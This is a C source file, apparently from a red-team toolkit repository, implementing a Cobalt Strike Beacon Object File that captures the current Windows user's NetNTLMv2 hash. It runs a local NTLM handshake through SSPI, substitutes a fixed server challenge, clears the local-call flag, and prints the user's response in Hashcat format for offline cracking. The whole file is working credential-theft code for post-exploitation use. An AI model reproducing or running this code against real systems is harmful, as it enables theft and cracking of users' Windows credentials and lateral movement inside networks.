zhensolid
/
OperatorsKit


			
							123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394
							#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#define SECURITY_WIN32
#include <Security.h>
#include <Wincrypt.h>
#include "capturenetntlm.h"
#include "beacon.h"

#pragma comment(lib,"Secur32")

#define MSV1_0_CHALLENGE_LENGTH 8
#ifndef bufsize
#define bufsize 8192
#endif
char *output = 0;  
WORD currentoutsize = 0;
HANDLE trash = NULL; 
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);

//
//Most of the code originates from: https://github.com/leechristensen/GetNTLMChallenge/tree/master
//

typedef enum {
	NtLmNegotiate = 1,
	NtLmChallenge,
	NtLmAuthenticate,
	NtLmUnknown
} NTLM_MESSAGE_TYPE;

typedef struct _STRING32 {
	USHORT Length;
	USHORT MaximumLength;
	DWORD  Offset;
} STRING32, *PSTRING32;

// Valid values of NegotiateFlags
#define NTLMSSP_NEGOTIATE_UNICODE               0x00000001
#define NTLMSSP_NEGOTIATE_OEM                   0x00000002  
#define NTLMSSP_REQUEST_TARGET                  0x00000004  
#define NTLMSSP_NEGOTIATE_SIGN                  0x00000010  
#define NTLMSSP_NEGOTIATE_SEAL                  0x00000020  
#define NTLMSSP_NEGOTIATE_DATAGRAM              0x00000040  
#define NTLMSSP_NEGOTIATE_NTLM                  0x00000200  
#define NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED       0x1000 
#define NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED  0x2000  
#define NTLMSSP_NEGOTIATE_LOCAL_CALL            0x00004000  
#define NTLMSSP_NEGOTIATE_ALWAYS_SIGN           0x00008000  

// Valid target types returned by the server in Negotiate Flags
#define NTLMSSP_TARGET_TYPE_DOMAIN              0x00010000 
#define NTLMSSP_TARGET_TYPE_SERVER              0x00020000  
#define NTLMSSP_TARGET_TYPE_SHARE               0x00040000  
#define NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY   0x00080000  
#define NTLMSSP_NEGOTIATE_IDENTIFY              0x00100000  

// Valid requests for additional output buffers
#define NTLMSSP_REQUEST_ACCEPT_RESPONSE         0x00200000 
#define NTLMSSP_REQUEST_NON_NT_SESSION_KEY      0x00400000  
#define NTLMSSP_NEGOTIATE_TARGET_INFO           0x00800000 
#define NTLMSSP_NEGOTIATE_EXPORTED_CONTEXT      0x01000000 
#define NTLMSSP_NEGOTIATE_VERSION               0x02000000  
#define NTLMSSP_NEGOTIATE_128                   0x20000000 
#define NTLMSSP_NEGOTIATE_KEY_EXCH              0x40000000 
#define NTLMSSP_NEGOTIATE_56                    0x80000000

// flags used in client space to control sign and seal; never appear on the wire
#define NTLMSSP_APP_SEQ           0x0040  

#define MsvAvEOL                  0x0000
#define MsvAvNbComputerName       0x0001
#define MsvAvNbDomainName         0x0002
#define MsvAvNbDnsComputerName    0x0003
#define MsvAvNbDnsDomainName      0x0004
#define MsvAvNbDnsTreeName        0x0005
#define MsvAvFlags                0x0006
#define MsvAvTimestamp            0x0007
#define MsvAvRestrictions         0x0008
#define MsvAvTargetName           0x0009
#define MsvAvChannelBindings      0x000A


typedef struct _NTLM_VERSION {
	BYTE ProductMajorVersion;
	BYTE ProductMinorVersion;
	USHORT ProductBuild;
	BYTE reserved[3];
	BYTE NTLMRevisionCurrent;
} NTLM_VERSION, *PNTLM_VERSION;

typedef struct _NTLMv2_CLIENT_CHALLENGE {
	BYTE RespType;
	BYTE HiRespType;
	USHORT Reserved1;
	DWORD Reserved2;
	ULONGLONG TimeStamp;
	BYTE ChallengeFromClient[8];
	DWORD Reserved3;
	BYTE AvPair[4];
} NTLMv2_CLIENT_CHALLENGE, *PNTLMv2_CLIENT_CHALLENGE;

typedef struct _NTLMv2_RESPONSE {
	BYTE Response[16];
	NTLMv2_CLIENT_CHALLENGE Challenge;
} NTLMv2_RESPONSE, *PNTLMv2_RESPONSE;

typedef struct _NEGOTIATE_MESSAGE {
	UCHAR Signature[8];
	DWORD MessageType;
	DWORD NegotiateFlags;
	STRING32 OemDomainName;
	STRING32 OemWorkstationName;
} NEGOTIATE_MESSAGE, *PNEGOTIATE_MESSAGE;

typedef struct _NEGOTIATE_MESSAGE_WITH_VERSION {
	UCHAR Signature[8];
	DWORD MessageType;
	DWORD NegotiateFlags;
	STRING32 OemDomainName;
	STRING32 OemWorkstationName;
	NTLM_VERSION Version;
} NEGOTIATE_MESSAGE_WITH_VERSION, *PNEGOTIATE_MESSAGE_WITH_VERSION;

typedef struct _CHALLENGE_MESSAGE {
	UCHAR Signature[8];
	DWORD MessageType;
	STRING32 TargetName;
	DWORD NegotiateFlags;
	UCHAR Challenge[MSV1_0_CHALLENGE_LENGTH];
	ULONG64 ServerContextHandle;
	STRING32 TargetInfo;
} CHALLENGE_MESSAGE, *PCHALLENGE_MESSAGE;

typedef struct _CHALLENGE_MESSAGE_WITH_VERSION {
	UCHAR Signature[8];
	DWORD MessageType;
	STRING32 TargetName;
	DWORD NegotiateFlags;
	UCHAR Challenge[MSV1_0_CHALLENGE_LENGTH];
	ULONG64 ServerContextHandle;
	STRING32 TargetInfo;
	NTLM_VERSION Version;
} CHALLENGE_MESSAGE_WITH_VERSION, *PCHALLENGE_MESSAGE_WITH_VERSION;

typedef struct _AUTHENTICATE_MESSAGE {
	UCHAR Signature[8];
	DWORD MessageType;
	STRING32 LmChallengeResponse;
	STRING32 NtChallengeResponse;
	STRING32 DomainName;
	STRING32 UserName;
	STRING32 Workstation;
	STRING32 SessionKey;
	DWORD NegotiateFlags;
} AUTHENTICATE_MESSAGE, *PAUTHENTICATE_MESSAGE;

typedef struct _RESTRICTIONS_ENCODING {
	DWORD dwSize;
	DWORD dwReserved;
	DWORD dwIntegrityLevel;
	DWORD dwSubjectIntegrityLevel;
	BYTE MachineId[32];
} RESTRICTIONS_ENCODING, *PRESTRICTIONS_ENCODING;

typedef LONG NTSTATUS;
typedef struct _UNICODE_STRING {
	USHORT Length;
	USHORT MaximumLength;
	PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _KEY_BLOB {
	BYTE   bType;
	BYTE   bVersion;
	WORD   reserved;
	ALG_ID aiKeyAlg;
	ULONG keysize;
	BYTE Data[16];
} KEY_BLOB;

NTSTATUS WINAPI SystemFunction007(PUNICODE_STRING string, LPBYTE hash);


//START TrustedSec BOF print code: https://github.com/trustedsec/CS-Situational-Awareness-BOF/blob/master/src/common/base.c
int bofstart() {   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); 
    va_end(args);
    
    if (buffersize == -1) return;
    
    char* transferBuffer = (char*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, bufsize);
	intBuffer = (char*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, buffersize);
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); 
    va_end(args);
    if(buffersize + currentoutsize < bufsize) 
    {
        MSVCRT$memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    } else {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize;
            if(buffersize < transfersize) 
            {
                transfersize = buffersize;
            }
            MSVCRT$memcpy(output+currentoutsize, curloc, transfersize);
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
                printoutput(FALSE); 
            }
            MSVCRT$memset(transferBuffer, 0, transfersize); 
            curloc += transfersize; 
            buffersize -= transfersize;
        }
    }
	KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, intBuffer);
	KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, transferBuffer);
}

void printoutput(BOOL done) {
    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    MSVCRT$memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}
//END TrustedSec BOF print code.


void SetPredefinedChallenge(UCHAR challenge[MSV1_0_CHALLENGE_LENGTH]) {
    const UCHAR predefinedChallenge[] = {0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88};
    MSVCRT$memcpy(challenge, predefinedChallenge, MSV1_0_CHALLENGE_LENGTH);
}


BOOL GetNTLMChallengeAndResponse() {
	CHAR szDomainName[256 + 1] = "";
	CHAR szUserName[256 + 1] = "";
	char ntlmsp_name[] = "NTLM";
	UCHAR bServerChallenge[MSV1_0_CHALLENGE_LENGTH];
	PNTLMv2_RESPONSE pNtChallengeResponse = NULL;
	PNTLMv2_CLIENT_CHALLENGE pClientChallenge = NULL;
	DWORD dwClientChallengeSize = 0;

	CredHandle hInboundCred;
	CredHandle hOutboundCred;
	TimeStamp InboundLifetime;
	TimeStamp OutboundLifetime;

	DWORD status = SECUR32$AcquireCredentialsHandleA(NULL, ntlmsp_name, SECPKG_CRED_OUTBOUND, NULL, NULL, NULL, NULL, &hOutboundCred, &OutboundLifetime);
	if (status != 0)
		return FALSE;

	status = SECUR32$AcquireCredentialsHandleA(NULL, ntlmsp_name, SECPKG_CRED_INBOUND, NULL, NULL, NULL, NULL, &hInboundCred, &InboundLifetime);
	if (status != 0)
		return FALSE;

	SecBufferDesc OutboundNegotiateBuffDesc;
	SecBuffer NegotiateSecBuff;
	OutboundNegotiateBuffDesc.ulVersion = 0;
	OutboundNegotiateBuffDesc.cBuffers = 1;
	OutboundNegotiateBuffDesc.pBuffers = &NegotiateSecBuff;

	NegotiateSecBuff.cbBuffer = 0;
	NegotiateSecBuff.BufferType = SECBUFFER_TOKEN;
	NegotiateSecBuff.pvBuffer = NULL;

	SecBufferDesc OutboundChallengeBuffDesc;
	SecBuffer ChallengeSecBuff;
	OutboundChallengeBuffDesc.ulVersion = 0;
	OutboundChallengeBuffDesc.cBuffers = 1;
	OutboundChallengeBuffDesc.pBuffers = &ChallengeSecBuff;

	ChallengeSecBuff.cbBuffer = 0;
	ChallengeSecBuff.BufferType = SECBUFFER_TOKEN;
	ChallengeSecBuff.pvBuffer = NULL;

	SecBufferDesc OutboundAuthenticateBuffDesc;
	SecBuffer AuthenticateSecBuff;
	OutboundAuthenticateBuffDesc.ulVersion = 0;
	OutboundAuthenticateBuffDesc.cBuffers = 1;
	OutboundAuthenticateBuffDesc.pBuffers = &AuthenticateSecBuff;

	AuthenticateSecBuff.cbBuffer = 0;
	AuthenticateSecBuff.BufferType = SECBUFFER_TOKEN;
	AuthenticateSecBuff.pvBuffer = NULL;

	CtxtHandle OutboundContextHandle = { 0 };
	ULONG OutboundContextAttributes = 0;
	CtxtHandle ClientContextHandle = { 0 };
	ULONG InboundContextAttributes = 0;

	// Setup the client security context
	status = SECUR32$InitializeSecurityContextA(&hOutboundCred, NULL, NULL, ISC_REQ_ALLOCATE_MEMORY | ISC_REQ_DELEGATE, 0, SECURITY_NATIVE_DREP, NULL, 0, &OutboundContextHandle, &OutboundNegotiateBuffDesc, &OutboundContextAttributes, &OutboundLifetime);
	if (status != SEC_I_CONTINUE_NEEDED) return FALSE;

	NEGOTIATE_MESSAGE* negotiate = (NEGOTIATE_MESSAGE*)OutboundNegotiateBuffDesc.pBuffers[0].pvBuffer;

	status = SECUR32$AcceptSecurityContext(&hInboundCred, NULL, &OutboundNegotiateBuffDesc, ISC_REQ_ALLOCATE_MEMORY | ISC_REQ_DELEGATE, SECURITY_NATIVE_DREP, &ClientContextHandle, &OutboundChallengeBuffDesc, &InboundContextAttributes, &InboundLifetime);
	if (status != SEC_I_CONTINUE_NEEDED) return FALSE;

	// client
	CHALLENGE_MESSAGE* challenge = (CHALLENGE_MESSAGE*)OutboundChallengeBuffDesc.pBuffers[0].pvBuffer;
	
	// Set the predefined challenge instead of the random one
	SetPredefinedChallenge(challenge->Challenge);

	// when local call, windows remove the ntlm response
	challenge->NegotiateFlags &= ~NTLMSSP_NEGOTIATE_LOCAL_CALL;

	status = SECUR32$InitializeSecurityContextA(&hOutboundCred, &OutboundContextHandle, NULL, ISC_REQ_ALLOCATE_MEMORY | ISC_REQ_DELEGATE, 0, SECURITY_NATIVE_DREP, &OutboundChallengeBuffDesc, 0, &OutboundContextHandle, &OutboundAuthenticateBuffDesc, &OutboundContextAttributes, &OutboundLifetime);
	if (status != 0) return FALSE;

	AUTHENTICATE_MESSAGE* authenticate = (AUTHENTICATE_MESSAGE*)OutboundAuthenticateBuffDesc.pBuffers[0].pvBuffer;

	// Get domain name
	MSVCRT$memcpy(szDomainName, ((PBYTE)authenticate + authenticate->DomainName.Offset), authenticate->DomainName.Length);
    szDomainName[authenticate->DomainName.Length] = 0;

	// Get username
    MSVCRT$memcpy(szUserName, ((PBYTE)authenticate + authenticate->UserName.Offset), authenticate->UserName.Length);
    szUserName[authenticate->UserName.Length] = 0;
	
	// Get the Server challenge
	MSVCRT$memcpy(bServerChallenge, challenge->Challenge, MSV1_0_CHALLENGE_LENGTH);

	// Get the Challenge response
	pNtChallengeResponse = (PNTLMv2_RESPONSE)((ULONG_PTR)authenticate + authenticate->NtChallengeResponse.Offset);

	pClientChallenge = &(pNtChallengeResponse->Challenge);
	dwClientChallengeSize = authenticate->NtChallengeResponse.Length - 16;

	// Print output in Hashcat Format: username:domain:ServerChallenge:response:blob
    internal_printf("[+] Successful NetNTLMv2 hash capture:\n");
    internal_printf("========================================\n\n");
    internal_printf("%ls::%ls:", szUserName, szDomainName);
	
	    // ServerChallenge
    for (int i = 0; i < sizeof(bServerChallenge); i++) {
        internal_printf("%02x", bServerChallenge[i]);
    }
    internal_printf(":");

    // response
    for (int i = 0; i < sizeof(pNtChallengeResponse->Response); i++) {
        internal_printf("%02x", pNtChallengeResponse->Response[i]);
    }
    internal_printf(":");

    // blob
    for (DWORD i = 0; i < dwClientChallengeSize; i++) {
        internal_printf("%02x", *((PBYTE)(&(pNtChallengeResponse->Challenge)) + i));  // 16 
    }
    internal_printf("\n");
	
	return TRUE;
}


int go() {
	if(!bofstart()) return;
	
	BOOL result = GetNTLMChallengeAndResponse();
	
	if (result) {
		printoutput(TRUE);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT,"\nFailed to capture NetNTLM hash.\n");
    }
	
	return 0;
}